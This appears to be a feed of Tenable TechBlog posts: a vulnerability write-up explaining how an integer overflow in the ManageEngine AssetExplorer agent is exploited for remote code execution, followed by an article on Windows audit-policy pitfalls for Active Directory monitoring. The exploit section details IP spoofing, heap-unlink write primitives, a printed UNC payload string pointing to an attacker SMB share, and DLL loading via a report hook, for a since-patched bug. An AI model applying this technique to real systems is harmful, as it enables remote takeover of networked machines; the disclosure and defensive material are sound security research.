We’ve now seen how an unauthenticated attacker can exploit a cross-site scripting vulnerability to gain remote code execution in ManageEngine ServiceDesk Plus. As I said earlier, David Wells has managed to exploit a heap overflow in the AssetExplorer agent software. If you’re an SDP or AssetExplorer server administrator, this is the agent software that you would distribute to assets on the network. This vulnerability would allow an attacker to pivot from SDP to agents. As you might imagine this is a dangerous attack scenario.

ManageEngine did a solid job of patching. I reported the bugs on March 17, 2021. The XSS was patched by April 07, 2021, and the RCE was patched by June 1, 2021. That’s a fast turnaround!

For more detailed information on the vulnerabilities, take a look at our research advisories: TRA-2021–11 and TRA-2021–22.


Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

17 August 2021 at 13:02

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server / agent model in which agents provide updates on machine status back to the Manage Engine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component which you can read here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444, allowing an attacker to fully compromise the server with SYSTEM privileges.

The blog here will go over the exploitation of an integer overflow that I found in the agents themselves (CVE-2021–20082) called Asset Explorer Agent. This exploit could allow an attacker to pivot the network once the ManageEngine server is compromised. Alternatively, this could be exploited by spoofing the ManageEngine server IP on the network and triggering this vulnerability as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase exploitation odds.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command however, the agent expects to receive an authtoken, which it echos back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem since that configured IP address is not ours, and instead asks the real Manage Engine server to approve our sent authtoken, which is always going to be denied.

There is a way an attacker can exploit this design however and that’s by spoofing their IP on the network to be the Manage Engine server. I mentioned certs are not validated which allows an attacker to send and receive requests without an issue. This allows full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited amount of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the Manage Engine server. Since we are assuming the attacker has been able to insert themselves as a fake Manage Engine server or have compromised a real Manage Engine server, this allows them to craft and send any POST response to this agent.

When the agent processes this POST request, WINAPIs for HTTP handling are used. One of which is HttpQueryInfoW, which is used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap to copy over the POST payload data.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Size field the size of UINT32_MAX/4, we should be able to overflow the integer to wrap back around to size 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API InternetReadFile, will copy over our POST payload data to the destination buffer until all its POST data contents are read. If our POST data is larger than two bytes, then that data will be copied beyond the two byte buffer resulting in heap overflow.

Things are looking really good here because we not only can control the size of the heap overflow (tailoring our post data size to overwrite whatever amount of heap memory), but we also can write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a double-linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means if we overwrite a _CrtMemBlockHeader* prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the contents of this arbitrary *prev address will have the _CrtMemBlockHeader* next pointer written to where *prev points to. It gets better…we can also overflow into the _CrtMemBlockHeader* next pointer as well, allowing us to control what * next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev are both dereferenced and written to in this remerging logic, which means I can’t just overwrite *prev pointer with any arbitrary data I want, as this must also be a valid pointer in writable memory location itself, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory and these pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as that points to RX protected memory) as well as preventing me from writing pointers to non-existent memory (as the dereference step in Free_dbg will cause access violation). This proved to be very constraining for my exploitation.

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory for the remote Asset Explorer service which is what I shoot for in developing an exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can modify this current working directory to point to a remote SMB share we own, and place a malicious .bat file on our SMB share with the same name, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this ideally would require some grooming, so we can trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately my heap grooming attempts were not working to force allocations where I wanted. This is partially due to the limited size I was able to remotely allocate in the remote process and a large part of my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts since I am only overwriting the linked list pointers of heap cells and the heap manager was apparently very ok with that. With that in mind, I run my heap overflow several times and hope it writes over a particular existing heap cell with my write primitive payload. I found ~20 attempts of this overflow will usually end up working to overflow the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC I am initially sending a string of to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string out once received and allocate a unicode string for each substring delimited by “#” symbols. Since the heap is allocated in a doubly linked list fashion, the order of allocations here will be sequentially appended in the linked list. So, what I need to do is overflow into the heap cell headers for the “XXXXXXXX2” string with understanding that its _CrtMemBlockHeader* next pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/ string.

If we overwrite the _CrtMemBlockHeader* prev with the .data address of the current working directory path, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* prev pointer then we won’t need an info leak. Since the upper three bytes dictate the SMB string’s general memory address, we just need to offset the last byte so that it will point to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I choose to overwrite the lowest order byte with “0xf8”, so guarantee max offset from _CrtMemBlockHeader.

It’s beneficial if we can craft an SMB path string that contains pre-pended nonsense characters to it (similar to nop-sled but for file path). This will give us greater probability that our 0xf8 offset points somewhere in our SMB path string that allows SetCurrentDirectory to interpret it as a valid path with prepended nonsense characters (ie: .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn’t work for SMB share, so with thanks to Chris Lyne, he was able to craft a nice padded SMB path like this for me:

//.//.//.//.//.//UNC//<ip_address>/a/

This will allow the path to be simply treated as “//<ip_address>/a/”. If we provide enough “//.” in front of our path, we will have about a ⅓ chance of this hitting our sled properly when overwriting the lowest *prev byte 0xf8. Much better odds than if I used a simple straight forward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I search for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic loading of a library (not super common for applications to do) that I can trigger, and also — it cannot be a known dll (ie: kernel32.dll, rpcrt4.dll, etc), since search order for these .dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. For this I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent where it will attempt to dynamically load “Mspdb80.dll”, a debugging dll used for RTC (runtime checks). This is an unknown dll so it should attempt to load it off it’s current working directory. Ok, so how do I call this thing?

Well, you can’t… I couldn’t find any XREFs to code flow that could end up calling this function, I assumed it was left in stubs from the compiler, as I couldn’t even find indirect calls that might lead code flow here. I will have to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

I am unable to write executable pointers with my write primitive, so this means I can’t just write this GetPdbDll function address as a return address on stack memory nor can I even overwrite a function pointer with this function address. There was one place however, that I saw a pointer TO a function pointer being called which is actually possible for me to abuse. It’s in _CrtDbgReport function, which allows Microsoft runtime to alert in event of various integrity violations, one of which is a failure in heap integrity check. When using a debug heap (like in this scenario) it can be triggered if it detects unwritten portions of heap memory not containing “0xfd” bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However this time…we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but let us leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in .data section too!). This is also great because this doesn’t have to be a pointer to executable memory (which we can’t write), because _pfnReportHook contains a pointer TO a function pointer (big beneficial difference for us). We just need to register our own _pfnReportHook that contains a function pointer to that function that loads “MSPDB80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute the “MSPDB80.dll” off our remote SMB share. We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier where you use subsequent heap cell allocations to bypass infoleak. This is because the unique scenario was only for unicode strings in this application, and we can’t represent our function pointers with unicode. For this step I choose to overwrite the _pfnReportHook variable with a random offset in my heap entirely (again, no infoleak required, similar technique as partially overwriting the _CrtMemBlockHeader* next pointer but this time overwriting the lower two bytes of the _CrtMemBlockHeader* next pointer in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdb function.

Yes this will certainly crash the program but that’s ok! We are at the finish line and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable’s PoC github — https://github.com/tenable/poc. Manage Engine has since patched this issue. For more of these details you can check out this ManageEngine advisory at https://www.tenable.com/security/research.


Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit…

6 July 2021 at 21:54

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit policy

Tenable.ad can detect Active Directory attacks. To do this, the solution needs to collect security events from the monitored Domain Controllers to be analyzed and correlated. Fortunately, Windows offers built-in audit policy settings to configure which events should be logged. But when testing those options, we noticed surprising behaviors that can lead to missed events.

When you configure your Active Directory domain controllers to log security events to send to your SIEM and raise alerts, you absolutely do not want any regression which would ultimately blind your SOC! In this article we will share technical tips to prevent those unexpected issues.

Disclaimer

This content is based on observations and our interpretation of Microsoft documentation. This article is provided “as-is” and we do not provide any guarantee of correctness nor exhaustiveness and you should only rely on Microsoft guidance.

Introduction

Starting with Windows 2000, Windows offered only simple audit policy settings grouped in nine categories. Those are referred to as “top-level categories” or “basic audit policy” and they are still available in modern versions.

Later, “granular auditing” was introduced with Windows Vista / 2008 (it was configurable only via “auditpol.exe”) and then Windows 7 / 2008 R2 (configurable via GPO). Those are referred to as “sub-level categories” or “advanced audit policy”.

Each basic setting corresponds to a mix of several advanced settings. For example, from Microsoft Advanced security auditing FAQ:

Enabling the single basic account logon setting would be the equivalent of setting all four advanced account logon settings.

The content described in this article was tested on Windows Active Directory domain controllers because those are the most appropriate sources of interest for Active Directory attacks detection, but it should apply to all kinds of Windows machines (servers & workstations).

Surprise #1 — Advanced audit policy fully replaces the basic policy

As soon as we enable even just one advanced audit policy setting, Windows fully switches to advanced policy mode and ignores all existing basic policies (at least on the recent versions of Windows we tested)! Here is a demonstration:

  • Before: the system uses basic settings. We enable “Success, Failure” for “Audit privilege use” (green highlighting) and for other categories the default values apply. This works as expected:
  • After: we only enable one advanced setting (green highlighting). Notice how everything else is not audited anymore, including what we explicitly configured in the basic policy (red highlighting)!

Therefore, you cannot have both and thus when you start using the advanced audit policy, which you should, you are committed to it and should abandon the basic settings to prevent confusion.

Microsoft Advanced security auditing FAQ explains it:

When advanced audit policy settings are applied by using Group Policy, the current computer’s audit policy settings are cleared before the resulting advanced audit policy settings are applied. After you apply advanced audit policy settings by using Group Policy, you can only reliably set system audit policy for the computer by using the advanced audit policy settings. […] Important: Whether you apply advanced audit policies by using Group Policy or by using logon scripts, do not use both the basic audit policy settings under Local Policies\Audit Policy and the advanced settings under Security Settings\Advanced Audit Policy Configuration. Using both advanced and basic audit policy settings can cause unexpected results in audit reporting.

➡️ Tenable.ad recommendation: use advanced audit policy settings only. Existing basic audit policies should be converted.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #2 — Advanced audit policy may be ignored

However, there are some cases where basic audit policy settings may still take priority over the ones defined in the advanced audit policy. Correctly understanding when and where it could happen is complicated.

As per Microsoft Advanced security auditing FAQ:

If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit policies, be sure to enable the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” policy setting under “Local Policies\Security Options”. This will prevent conflicts between similar settings by forcing basic security auditing to be ignored.

➡️ Tenable.ad recommendation: once you start using advanced audit policy, we recommend enabling the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” GPO setting to prevent undesired surprises. Its default value being “Enabled”, it should already be effective anyway in the majority of environments.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #3 — Advanced audit policy default values are not respected

As we saw previously, as soon as we enable even just one advanced audit policy setting the system entirely switches to the advanced mode. The question we may have now is how does the system manage the other settings that we did not specify? There are certainly sensible default values, aren’t there? These default values are described in the documentation of each audit policy setting. Let’s read the explanation of the “Audit Logon” setting:

So, here on a server I should expect a default value of “Success, Failure” for the “Audit Logon” setting if not configured, shouldn’t I? Well, we may have a surprise here.

Here is the configuration I applied on my server: I enabled “Success” logging for “Audit Account Lockout” and left “Audit Logon” as “Not Configured”:

However, when looking at the resulting audit policy I notice that “Logon” events are not audited, contrary to their default:

We knew we should not rely on defaults… but this one is really surprising. Of course we made sure that there was no other GPO defining any audit policy setting.

➡️ Tenable.ad recommendation: do not rely on default values for Advanced audit policy settings: explicitly configure the desired value (No Auditing, Success, Failure, or Success and Failure) for each setting of interest.

Be even more careful when migrating from a basic audit policy: make sure to export the resulting policy you had on a normal machine, and convert it to all the appropriate advanced settings to prevent any regression in logging. And as usual with GPOs, especially for security settings, aim to create a single security GPO linked the highest possible, instead of spreading those in many lower-level GPOs.

Surprise #4 — Settings defined by GPOs are not merged

What happens when a machine is covered by several GPOs which define audit policy settings? What if one GPO enables “Success” auditing while another enables “Failure” auditing, is there a merge and would we obtain “Success and Failure”?

Answer: there is no merge at the setting level, and only the value of the GPO with the highest priority is applied. This is actually coherent with the way the Group Policy engine usually works, so not really a surprise, but still to keep in mind.

Here is a demonstration where we want to configure auditing on domain controllers. Two GPOs apply to those servers:

Default Domain Policy” linked at the top of the Active Directory domain

  • Audit Account Lockout” is set to “Success and Failure” (yellow highlighting)
  • Audit Logon” is set to “Success” (red highlighting)

Default Domain Controllers Policy” linked to the “Domain Controllers” organization unit

  • Audit Logoff” is set to “Success and Failure” (blue highlighting)
  • Audit Logon” is set to “Failure” (red highlighting)

Now let’s see the resulting audit policy:

We notice that the conflicting values for “Logon” (red highlighting) were not merged, instead it is the value of the “Default Domain Controllers Policy”. This GPO won as per the usual GPO precedence rules.

We also observe that the values for “Logoff” (blue highlighting) from the “Default Domain Controllers Policy” and “Account Lockout” (yellow highlighting) from the “Default Domain Policy” are both properly applied because those were not in conflict.

Here is how Microsoft Advanced security auditing FAQ explains it:

By default, policy options that are set in GPOs and linked to higher levels of Active Directory sites, domains, and OUs are inherited by all OUs at lower levels. However, an inherited policy can be overridden by a GPO that is linked at a lower level.

You can also read more about GPO Processing Order in the [MS-GPOL] specification.

➡️ Tenable.ad recommendation: keep in mind that conflicting audit settings are not merged.
If you want to define a domain-wide security auditing GPO, you should ensure that no other GPO at a lower OU level overrides its settings. If necessary, you can set this domain-wide GPO as “Enforced”, even if this is not our preferred option as it can become confusing when managing a large set of GPOs.

If you are only concerned about auditing on domain controllers, you can link a GPO to the “Domain Controllers” organizational unit, as long as there is no domain-level “Enforced” GPO overriding audit policy settings.

Surprise #5 — Only one tool properly shows the effective audit policy

We have just shown that we can have many surprises when configuring auditing, so we really would like a way to see the effective audit policy on a system to confirm that it is as expected.

We could be tempted to use tools which compute the result of GPOs (RSoP), but…

For example, “rsop.msc” does not even seem to support advanced audit policy, which is not too surprising since it is deprecated! See how this section is used in the GPO editor on the right-hand side whereas it is missing in “rsop.msc” on the left-hand side:

And with “gpresult.exe”, if we have basic and advanced audit policies, we will see both: which one applies?

And what about settings that might have been configured locally and not through a GPO (which is not advised…)?

The only supported tool which can properly read the current effective audit policy is “auditpol.exe”, as you may have guessed from our previous screenshots. This is confirmed by a Microsoft blog post. For those who want to dig deeper: “auditpol.exe” calls AuditQuerySystemPolicywhich finally calls the “LsarQueryAuditPolicy” RPC in LSASS.

➡️ Tenable.ad recommendation: only trust the following command to see the effective audit policy on machines: “auditpol.exe /get /category:*”

Surprise bonus — Confusions in the specification

Configuring advanced audit policy in a GPO creates an “audit.csv” file which is described in the [MS-GPAC] Microsoft open specification. We found a mistake in one of the examples:

Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value
TEST-MACHINE,System,IPsec Driver,{0CCE9213–69AE-11D9-BED3–505054503030},No Auditing,,0
TEST-MACHINE,System,System Integrity,{0CCE9212–69AE-11D9-BED3–505054503030},Success,,1
TEST-MACHINE,System,IPsec Extended Mode,{0CCE921A-69AE-11D9-BED3–505054503030},Success and Failure,,3
TEST-MACHINE,System,File System,{0CCE921D-69AE-11D9-BED3–505054503030},Not specified,,0

On the right-hand columns we have the setting name (such as “No Auditing”, “Success”, etc.) and the corresponding numerical value (0, 1, 3…). We can see that according to the first and last lines the value “0” is associated with both “No Auditing” and “Not specified” which does not make sense. Fortunately the text value is ignored: “value of InclusionSetting is for user readability only and is ignored when the advanced audit policy is applied”.

Also, we found the specification a bit confusing regarding the values of “0” and “4”:

A value of “0”: Indicates that this audit subcategory setting is unchanged.
A value of “4”: Indicates that this audit subcategory setting is set to None.

Our observations actually show that:

  • A value of “0” means that auditing is “disabled”, which corresponds to this in the graphical editor:
  • A value of “4” means that auditing is “not specified”, and thus the default value should apply (except when it does not, as shown before), which would correspond to this in the graphical editor (except that in this case the editor does not even generate a line for this setting in “audit.csv”):

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit… was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

❌
❌